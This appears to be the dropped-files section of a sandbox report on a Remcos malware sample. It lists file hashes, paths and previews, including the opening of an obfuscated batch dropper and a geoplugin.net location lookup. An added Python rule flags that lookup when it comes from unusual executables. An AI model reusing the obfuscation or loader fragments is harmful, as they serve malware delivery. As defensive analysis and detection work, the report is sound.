                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):137216
                                                                                      Entropy (8bit):6.481339286025911
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:npIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTqI:IphfhnvO5bLezWWt/Dd314V14ZgP08
                                                                                      MD5:1CB233987779B587705687B7D8F66A01
                                                                                      SHA1:5F33D543C24701D370072BB4E77E4A8D058AE035
                                                                                      SHA-256:48A4A6FD51F6F62D3E814BCF14891ACE7D7813C90BE50D6B133FBEFF21B9E137
                                                                                      SHA-512:56DF98EC38109FB121D69D84140EFFC81F0EEF25BFB48C25D23EF5C45C274A5DC4015DBFDB63616530F804896B9F19788AAE60BFCCBC43292F113E2EC82350F6
                                                                                      Malicious:false
                                                                                      Preview:.j.....I......u0..$.I....Q..|....L..t..I8.A..|....D..t..@8.@...j..E.PW....I....u:..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I..X....u.W....I...t8..$.I....Q..|....L..t..I8.A..|....D..t..@8W.@....(.I.....u.........F......>_^3.[....U...$VW...M..&....E..@..0....p...N..U.......u.....I...u=..$.I....Q..|:...L:.t..I8.A..|:...D:.t..@8.M.h..I..@....M...L.@.j..0.E.P.L.......u.....I.P.M......M.......U.M.......M..E.P.\...M.......M......_3.^....U...0...SVW.}...G........W...]..J......M...h..I..9M.....u....H..|1...D1.t..@8.H...|1...D1.t..@8.@...!...j...t...........PS.............G.P.V...YP.M...#...].j.WS.u.....I..............tw.E..x..r..@..H..+.....uIS..;..q..Y;.u:S.M...#...M......U.M.......M..E.P.}[...M......M......V.M.WSW....P.........@..j.j..H....[......$.I....I..|1...T1.t..R8.B..|1...D1.t..@8.@...E..(.u.j.P.(...S.i......_^3.[....U..SV.u...W.F....Q....V....J.......N...I..o...j.PRW....I..u......3....F........u3.&...$.I....I..|....T..t..R8.B..|....D..t..@8.@.....>_^3.[]...U
                                                                                      Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):963
                                                                                      Entropy (8bit):5.019205124979377
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:tkluWJmnd6UGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlupdVauKyGX85jvXhNlT3/7AcV9Wro
                                                                                      MD5:B62617530A8532F9AECAA939B6AB93BB
                                                                                      SHA1:E4DE9E9838052597EB2A5B363654C737BA1E6A66
                                                                                      SHA-256:508F952EF83C41861ECD44FB821F7BB73535BFF89F54D54C3549127DCA004E70
                                                                                      SHA-512:A0B385593B721313130CF14182F3B6EE5FF29D2A36FED99139FA2EE838002DFEEC83285DEDEAE437A53D053FCC631AEAD001D3E804386211BBA2F174134EA70D
                                                                                      Malicious:false
                                                                                      Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
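The JSON above is a geoplugin.net response written to disk by Propose.com, a renamed PE running out of the browser cache directory; Remcos uses this lookup to learn the victim's public IP and location. A useful detection is not the domain alone (legitimate software queries geolocation APIs) but the combination of that lookup with an unusual initiating image. The following Python is an added example, not part of the report and not a Joe Sandbox or Sigma rule: it runs that logic over three constructed Sysmon-style network events (field names Image and DestinationHostname follow Sysmon Event ID 3). The list of geolocation hosts beyond geoplugin.net and the extra executable extensions beyond .com are assumptions you would tune for your environment.

```python
import re

# Hosts treated as IP-geolocation services. geoplugin.net comes from the dropped JSON;
# the www. variant is an assumption.
GEO_IP_SERVICES = {"geoplugin.net", "www.geoplugin.net"}

# A PE launched from a user-writable profile directory is the anomalous part.
USER_WRITABLE = re.compile(r"^C:\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)

# .com is what the report shows; .pif and .scr are assumed additional
# "not .exe but still runs as a PE" extensions.
ODD_PE_EXT = (".com", ".pif", ".scr")


def is_suspect_geo_lookup(event):
    """True when a geolocation lookup originates from an odd image path or extension."""
    image = event.get("Image", "")
    host = event.get("DestinationHostname", "").lower().rstrip(".")
    if host not in GEO_IP_SERVICES:
        return False
    return bool(USER_WRITABLE.match(image)) or image.lower().endswith(ODD_PE_EXT)


def flag_events(events):
    """Return the Image of every event that matches, in input order."""
    return [e["Image"] for e in events if is_suspect_geo_lookup(e)]


# Constructed sample events; only the first reproduces the path seen in the report.
SAMPLE_EVENTS = [
    {"EventID": 3,
     "Image": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com",
     "DestinationHostname": "geoplugin.net", "DestinationPort": 80},
    {"EventID": 3,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "geoplugin.net", "DestinationPort": 80},
    {"EventID": 3,
     "Image": r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com",
     "DestinationHostname": "www.microsoft.com", "DestinationPort": 443},
]


if __name__ == "__main__":
    for image in flag_events(SAMPLE_EVENTS):
        print("suspect geolocation lookup from", image)
```

The browser event is left alone on purpose: alerting on every geoplugin.net connection buys noise, while the image-path and extension conditions keep the rule tied to what actually distinguishes the sample's behaviour.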
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):74752
                                                                                      Entropy (8bit):6.557400918137722
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:D7nts/M26N7oKzYkBvRmLORuCYm9PrpmESvn+pqFqaynBk:nt8T6pUkBJR8CThpmESv+AqVnBk
                                                                                      MD5:15BE985957A02EE4B7D96A3C52FF0016
                                                                                      SHA1:B3819CED551350AFD965B7CA5D7CF91AE5C1A83C
                                                                                      SHA-256:E223F63B343F2BB15155825BA679F91FCAF2DB9E359988B7ABD24202EBEC2AFF
                                                                                      SHA-512:9A56A0EBAA86F59F56F92937AA724FC1BFD1DBFFDE430E9D86598C94D8ED958ABA82021AEC758A22786746F807DCEBE99974EFF6975EFE8EFD68CBFBC85D030C
                                                                                      Malicious:false
                                                                                      Preview:.tM...u.S..S..Y.x.3.PPPPWSPP....I..E...t';.}...VP.u...Y..3.PP.u.VWSPP....I...^..3._[..SW3...PPj.SPh........I.....t-V3.j.Z.........Q.#...YW..Vj.Sj.h........I...^_[.U..E....t....uA..3M..(.=.3M..t1.}..t+.=.3M..t...3M..H......3M..u..u..u..........2.]...U..QQ.E..e...E...y..e...E...3M.P.....u..M.........U..Q.e...=.3M..t..=.3M..t...3M..H......3M..E.P.u........t.......E...3M.P.u...............SV..3.W8^.t..N..y...t.Q.:\...~..^.8^.t......N..y...t.Q..\...~..^..._^[.U..VW......t..U..w......B..F..G...1j........E.Y.&..H..N...y..f...0..V.C....G..F..w..._^]...U....SV..M.W3..~..~..A..F...t....A..F..A..F.............3..j Z.........3...........P.$...Y..t$......E...t......|..... ...u.E.3.....F.9>~[.]...E..K..V.....M.U......Z..A..B..A..B..A..].;.].t..M.P......M.U..A.G.B..E... .E.;>|._..^[....V..N..{.....^.......U..V..W3.G.N...;.~!Hj....*...j..8.F..F......G...YY....f.E..~._f..3..f.H...^]...Vh..F..q..6j Q.a..........QV....YY..^...U..M...u.3..%.E.V.u..;.}.....t.+........t.+...^]...U..
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):90112
                                                                                      Entropy (8bit):6.7085176792029815
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Ph+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7f:PAU4CE0Imbi80PtCZEz
                                                                                      MD5:7FC8AB46CD562FFA0E11F3A308E63FA7
                                                                                      SHA1:DD205EA501D6E04EF3217E2D6488DDB6D25F4738
                                                                                      SHA-256:5F9C0A68B1C7EECA4C8DBEA2F14439980ACE94452C6C2A9D7793A09687A06D32
                                                                                      SHA-512:25EF22E2B3D27198C37E22DFCD783EE5309195E347C3CC44E23E5C1D4CB58442F9BF7930E810BE0E5A93DD6F28797C4F366861A0188B5902C7E062D11191599C
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):147456
                                                                                      Entropy (8bit):6.70232349488191
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:4nVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnj0nEoXnmowS2u5hVOoQb:4VIPPL/sZ7HS3zcNPj0nEo3tb2D
                                                                                      MD5:C038EEFE422386831ACF8D9D6898D464
                                                                                      SHA1:9CF7F3E9A50218D5E03617B793EAE447645E6A90
                                                                                      SHA-256:1432A3A16C1D41EBB71D0A5CC03ED80A93817E6295B82FC63A1EC39D9320C701
                                                                                      SHA-512:8327453C75ECC04DB02A6C1DC38B38EB486F4D773E2025097E4D6B6F8E78655A25B7FA3528E2E66381EF80175182F7C1B89A7E8DD63A655D8ECEF5AB1DDE5EA1
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:OpenPGP Secret Key
                                                                                      Category:dropped
                                                                                      Size (bytes):61440
                                                                                      Entropy (8bit):7.997097243867807
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:7aUiJuOem/qCP8QNYVGuid4T3D91PkL2qW4zV2G4Jb:Ccm/qCP8kYuCB1bT4zV2rt
                                                                                      MD5:838511D6727BE6237C1E4CD26A0885DE
                                                                                      SHA1:7A9FFA35532A5817F04CB48C9E154B5C9DE74623
                                                                                      SHA-256:D36E240FA73FFB483BBCEC5593B95B924D219EE1A95E6541E0CC3FEE0FD5ECB7
                                                                                      SHA-512:AC880DA501150B974DF9B42AEF6A63346B6B5036A893A09FDD05D0FECB9FC655D3E76D19EF5DB48DFD54457D5FC514499526F476F595972E970ED9953842C029
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):76800
                                                                                      Entropy (8bit):7.997538946660952
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:bA42RuQjUqaBXOkQHtReXxQiIjiDdmfLyiEmSZBhqjM1VOUWLAGuFIs:bAnRfjSKtIFELC5ZBhMMGuFIs
                                                                                      MD5:7B5C9E82025D184E64A7413174CE1A1C
                                                                                      SHA1:C552965CE73D43225541932D65C3B4B6342A70E4
                                                                                      SHA-256:7A524BC28CF358088006F8F852D7AE59F5A143D8754E47FFE4A8F31533CF315E
                                                                                      SHA-512:71214F0379E8104C198B16A304D593032264435DD2FE4A5383D3F39FA496D18A6B7EC770A90542028B71C7A50611313AE47234C5EA0A0FB81724557941B12EB4
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1237
                                                                                      Entropy (8bit):3.752009061763574
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:eyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1zgNu3NIhfnQARahmv6+VQ:eyGS9PvCA433C+sCNC1skNkvQfhSg
                                                                                      MD5:47FE88841F7CEA67286B6BB812A7A09F
                                                                                      SHA1:950297A08CADDC4F0FB20B0D84539DE2B8DA36E1
                                                                                      SHA-256:33F5D8B8FB7CD67BB7C1805CE89BFC16C9F4BBFC0342D31C9946511FDC4B115C
                                                                                      SHA-512:C200196C26738DFA7013356656D281284928E256E423B11F679A71C3F8E75F04927474CC4AF853C2FE351F6051B084A902FD03D3106E14062634251EECFFF73F
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):70656
                                                                                      Entropy (8bit):5.9158452815608795
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:qHsWccd0vtmgMbFuz08QuklMBNIimuzaAwus5:qLeAg0Fuz08XvBNbjaAts5
                                                                                      MD5:E6FE42ADC3082D12E845756426492B6E
                                                                                      SHA1:E1170EE049AB607162D1495B625AA74221AA8585
                                                                                      SHA-256:BFEA812CBDAFE08DF94D9C13CC6364F3BE76793E4676488338A17E2866BF8DFD
                                                                                      SHA-512:9E994CDCAF75089D9468BCC367FD9717F8F2F1FE10B181F0616C712A5674CACC7601421B72B1E50336F222CAAB392F09DB984C4671F5CAB8C1519102F4E4D6EC
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):98304
                                                                                      Entropy (8bit):7.9979666143694095
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:WdRAC50xWY7+r0weiORc8vTDzcvmgmQj21JVWAQfqB+ILeLBuQi2FUqAqT3Y4+/u:GvY7+rJenS8vTvcvHj2zVWxfq5Uu5pqn
                                                                                      MD5:52C875EB8A3EBC4643094465CDBB08D0
                                                                                      SHA1:013139AD7BBE0E2522CCC69EE890E63D8CA3FF3C
                                                                                      SHA-256:A363E5C9DD6872D625FDF1A6E957D0E08B4605E97D8130B0175A6889BE5196EC
                                                                                      SHA-512:97A6489038FF72109EA847A94C55DB9798F165E3D570F8677C6139C930DC67420BA783BE2F3939B74676C673D6AAA7EF2CAB107DBF7908A5CE228916FCDAAB0B
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):23449
                                                                                      Entropy (8bit):5.134148367041093
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                                      MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                                      SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                                      SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                                      SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                                      Malicious:false
                                                                                      Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:ASCII text, with very long lines (975), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):23449
                                                                                      Entropy (8bit):5.134148367041093
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:b5EawfiYUKjpwVHqyl4PS5Riya68+DsfBL6pbHuwBl60YuyoVDKK3utLK5u+u0EC:bGawfr9Yxbriya68+YQZHuoE0Yxo73e+
                                                                                      MD5:9EF6EFA272560F1DEE8923508DAFE2C9
                                                                                      SHA1:7E6572FA616E8FE8AB67D2518F8685EB01F46923
                                                                                      SHA-256:3B887BAB036D30A1A4FB5C2C6B828F5EF3D8D5C1FF8D4147ED647ACB51AC808A
                                                                                      SHA-512:D17464F391FFC0CDB60D5A5669779343C4363130BC31E3902512ECEB5A139454992C00D1D8A9AA5D0BF142B904059E5F90A8804A1D2406FF398D893EA5804CF4
                                                                                      Malicious:false
                                                                                      Preview:Set Plug=4..ZQrEf-Bdsm-Janet-Dans-Genres-Census-Strips-Japan-Arrest-..wCAHostels-Incentives-Resolutions-Cave-Prefix-..QbtFancy-Biodiversity-..zLPetite-Holdem-Pam-Francis-Exchange-..CDeOffers-..iQSi-Sexuality-Sisters-..mTSPsychological-Changes-..ZhUgItself-Reverse-..MFVChips-Universities-..pyGMExample-Duncan-Vermont-Literally-Eh-Corresponding-..Set Catherine=9..QdHDivided-Onion-Treatment-Dan-..AtzaAttorneys-Participation-Miracle-Divine-Strongly-..YoRepeat-..TxVSFun-Counted-Transport-Miss-Settle-Receptors-Vulnerable-Distinguished-..yrpZStood-Isp-Supplies-Punch-Wayne-Ventures-..VcHas-Personalized-Encouraging-Thereof-..xkqAsthma-Campaigns-Taxi-Info-..KsJfRequirements-Cam-Says-Coast-Geo-..Set Diagnosis=J..KuSteering-Micro-Louisiana-Sur-..WnmrCorn-Producer-Perfume-Units-Releases-..LCCulture-Corruption-Wives-Departments-Hd-Autos-Electoral-Knowing-Hardwood-..WGNiBoolean-..lRrCPortraits-Desktops-Monthly-Weather-Fioricet-Targets-Conditions-Fox-R-..GMCenturies-Suit-Exchange-Buck-Sep-Inn-Hugo-As-R
                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):43912
                                                                                      Entropy (8bit):7.0754478586730984
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:tBGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:tBGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                      MD5:28E6332970BFF06A0431BFEFBCD59462
                                                                                      SHA1:20902CDBF1A8D4DC081ADB967692C0C4ADD030BC
                                                                                      SHA-256:85C250563E37692A5A0188EAC2EE3E27D6A7DAB102E0200DF20D027B33DE8E91
                                                                                      SHA-512:CB1FB1F5A97E6A4F790D61E6964FFA4967591946DC03C639E944455DE893070547DA9B5401952DD5FA93FF66CF5F66F7A15F04913C41F4514A7DE067C8E6F60C
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):42495
                                                                                      Entropy (8bit):7.994847286020057
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:0SLfZMdEvp3jxmff02Y0Vo91+u08R48OcPk4h+ZnWlJcCQbem8OU3VOmWZ:bZg02tV21q1P4h3wHAFOmWZ
                                                                                      MD5:062E20D07FE052044D9339A8B3F1CB38
                                                                                      SHA1:5428326E6D395EEBABEB3FFB1972AE6A8C3DA8AE
                                                                                      SHA-256:84DB270DF2972367E799A4F919E5033475A5395B9AD59F50456E340A980B693A
                                                                                      SHA-512:2EE25F17BB5BE528ABD2CE9FE4877BFA58B2D30A9503D22B31DD16C80A7B248D14142AAB42ACFFD0A069975490CF370435310E08187311365136680657D3BDF1
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):58368
                                                                                      Entropy (8bit):7.996685518527556
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:Kftiu0ideTjMGF6+YCYNRbYPUU1gqE1oe6kWjlu:958eTN6rCeYPz1gMeClu
                                                                                      MD5:734A793F9424DE731EEE480B610E0257
                                                                                      SHA1:DD2073F71258FC036517ED503B3F85FD8ECDFDA6
                                                                                      SHA-256:0915FFDD69CF4511B586769737D54C9FF5B53EDA730ECA7A4C15C5FF709315EC
                                                                                      SHA-512:194915FEEFA2E7D04F0683FD5AF0F37FC550F1A8F4883D80D4CE0E4B6E4091BD9049A52E0FB3E5D3DB872B711431E1D5E7800AA206E3B5654DFD1266FB452335
                                                                                      Malicious:false
                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):67584
                                                                                      Entropy (8bit):7.996945320826708
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:9bqjXKdCr6Qw/ljXmAZUNbHaQPc0osgAuB6mrQjh4GVnY4t8PwMU:9OadCretrniNX1osgAGrQh4GVY4ePwMU
                                                                                      MD5:10CF860D6ED7F8B77D7F02A407DDDE2C
                                                                                      SHA1:42C54FF8B32BD09B583E544837A65248AF7B60AB
                                                                                      SHA-256:A4E09DE3E94F24B4D2D780667569166F242486A7912706A58AB32CF88F547069
                                                                                      SHA-512:355179700261EE76D67CEFCC27A120CA636278636420DF8D5CCE965055CC05F5249F86230A4C1695FCD3DB4A9B91CFD0D1AF5E6723F3A9B396DB1F4B70EC0052
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):21979
                                                                                      Entropy (8bit):5.049158677118914
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:aPVoGIpN6KQkj2qkjh4iUxehQVlardFWgxOdB2tAHkDNXp5pNSSme+vOjJiYo0ik:aPV3IpNBQkj2Ph4iUxehYlardFWgxOdm
                                                                                      MD5:E85ADBB7806D6C2B446681F25E86C54E
                                                                                      SHA1:7945DA1DD2CC4F96AD9DD6E40803842C3497B0C0
                                                                                      SHA-256:1DE8C1E231A1C77FB42123C0362070540F9692F0A3E4EA5141C6F8EE8DE8EBF5
                                                                                      SHA-512:D60A6998458E9D2FB6F6345306DA7CB679E8A8202270B1C31519FFD017C102D7B46A7FD98011577784E2ADA33C0FCCA138EA1BB68C4260E45FA3BAFC307A60D3
                                                                                      Malicious:false
                                                                                      Preview:PSMODULECACHE.......CB.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem...............?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet..........?T.z..C...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1........Register-IscsiSession........New-IscsiTargetPortal........Get-IscsiTarget........Connect-IscsiTarget........Get-IscsiConnection........Get-IscsiSession........Remove-IscsiTargetPortal.....
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):0.34726597513537405
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlll:Nll
                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                      Malicious:false
                                                                                      Preview:@...e...........................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):246
                                                                                      Entropy (8bit):3.498421423848992
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88ClErNZH:Qw946cPbiOxDlbYnuRKdDrNJ
                                                                                      MD5:7DDAB26AB5FE3057C3B881EBD245BB0E
                                                                                      SHA1:D6A7A5A6161E5E6737CAE769917BEA6FC2DFC0F2
                                                                                      SHA-256:3C6BA64F05E0E11398E081ADCF077167505AFB51D0FC06AC1296BB1B71D714F3
                                                                                      SHA-512:85D08EAB1F393F1FCBE4D67CF880E45D1B5C943E936DFA75CB4E9A1C1975F6F296AC2DC7C921E34A409C67051A95F6BF841E23EBC46B0BC873673874C6820ABA
                                                                                      Malicious:false
                                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.1./.0.1./.2.0.2.5. . .1.6.:.5.3.:.1.1. .=.=.=.....
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                      (Nine further dropped-file entries follow in the report with exactly the same metadata as the entry above: powershell.exe, 60 bytes, entropy 4.038920595031593, MD5 D17FE0A3F47BE24A6453E9EF58C94641, contents "# PowerShell test file to determine AppLocker lockdown mode". They are collapsed here. PowerShell writes this probe file to the user's temp directory each time it starts, to test whether AppLocker/WDAC script enforcement is active; the ten copies are a side effect of the PowerShell processes the sample launched, not attacker-authored content.)
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                      Category:dropped
                                                                                      Size (bytes):16525
                                                                                      Entropy (8bit):5.345946398610936
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                      MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                      SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                      SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                      SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                      Malicious:false
